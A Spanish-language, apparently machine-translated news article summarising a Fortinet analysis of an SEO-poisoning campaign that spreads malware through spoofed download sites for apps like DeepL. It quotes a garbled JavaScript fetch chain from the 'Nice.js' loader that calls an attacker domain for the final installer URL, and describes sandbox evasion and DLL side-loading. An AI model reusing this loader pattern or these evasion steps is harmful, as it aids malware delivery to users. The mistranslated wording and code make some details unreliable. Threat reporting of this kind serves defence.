En agosto de 2025, los investigadores de seguridad descubrieron una sofisticada campaña de envenenamiento de SEO dirigida a usuarios de Windows de habla china.
Al manipular las clasificaciones de resultados de búsqueda con complementos de SEO a medida y registrar dominios parecidos, atacantes con éxito enmascararon los sitios de descarga de software malicioso como proveedores legítimos.
Las víctimas que buscaban aplicaciones populares como DeepL fueron redirigidas a páginas falsificadas con sustituciones de carácter mínimas y un lenguaje convincente, lo que les llevó a descargar instaladores armados en lugar de un software genuino.
Esta técnica permitió a los actores de amenaza llegar a una audiencia amplia sin requerir correos electrónicos directos de phishing o ingeniería social más allá de los dominios falsos.
Analistas de Fortinet identificado Clasificación de dominios fraudulentos múltiples en los motores de búsqueda, cada uno diseñado para distribuir una combinación de binarios de aplicación legítimos y cargas útiles maliciosas.
Al visitar uno de esos sitios, un cargador basado en JavaScript llamado Nice.js orquesta un proceso de descarga de varios pasos que recupera dinámicamente las respuestas JSON para determinar la URL final del instalador.
El sitio falso se ubica altamente en los resultados de búsqueda (fuente – Fortinet)
Esta inyección perfecta de malware en el flujo de instalación hace que la detección de usuarios casuales sea prácticamente imposible.
Las credenciales robadas y los datos del sistema recopilados por estos instaladores armados pueden aprovecharse para obtener más compromisos, movimiento lateral o venta en mercados subterráneos.
El impacto de esta campaña se extiende más allá del simple robo de credenciales. Una vez ejecutado, el instalador MSI se eleva a los privilegios del administrador y deja varios componentes, incluidos una DLL ligada a depuración, archivos con cremallera fragmentados y archivos auxiliares, en directorios del sistema.
Una rutina de anti-análisis dentro de la DLL primaria lleva a cabo verificaciones de procesos principales, verificación de integridad del sueño a través de consultas de fecha HTTP e inspecciones de tabla ACPI para evadir los entornos de sandboxing y virtualización.
Solo después de estos cheques, el malware reconstruye y descomprime su carga útil, asegurando una implementación robusta en máquinas genuinas de usuario final.
Mecanismo de infección
El núcleo del mecanismo de infección se encuentra en el script nice.js incrustado dentro de los sitios falsificados.
Tras la carga de la página, el script ejecuta una secuencia de solicitud de la siguiente manera:-
fetch (`https://spofeddomain.com/api/download?device=$ {deviceType} & domain = $ {currentDomain}`) .then (respuesta => respuesta.json ()) .Then (data => fetch (data.secondarylink)) .then (respuesta => respuesta.json ().). data.finalUrl);
Esta cadena de redireccionamientos basados en JSON no solo oscurece la entrega de contenido malicioso, sino que también permite al actor de amenaza adaptar las cargas útiles en función del tipo de dispositivo de la víctima y el origen del dominio.
Mecanismo de persistencia (fuente – Fortinet)
Una vez que el usuario se redirige a la URL final, el paquete MSI combina un instalador profundo legítimo con el enumw.dll malicioso, a la que se hace referencia a una ruta de depuración en el sistema del atacante.
El archivo enumw.dll desencadena una acción personalizada dentro del instalador de Windows para ejecutar su función OOO89, iniciando las verificaciones anti-análisis antes de la extracción de carga útil.
Los archivos ZIP fragmentados (temp_data_1 a través de temp_data_55) se reconstruyen en un archivo emoji.dat, descomprimidos e implementados en un directorio único llamado PLSAMC {Systemuptime} en el perfil del usuario.
La carga lateral posterior de un Vstdlib.dll empaquetado buscando archivos exe hermanos garantiza la persistencia y complica el análisis forense.
Flujo de ataque (Fuente – Fortinet)
El ataque fluye del resultado inicial de la búsqueda a la ejecución final de la carga útil, destacando el sigilo y la sofisticación de esta operación de envenenamiento de SEO.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
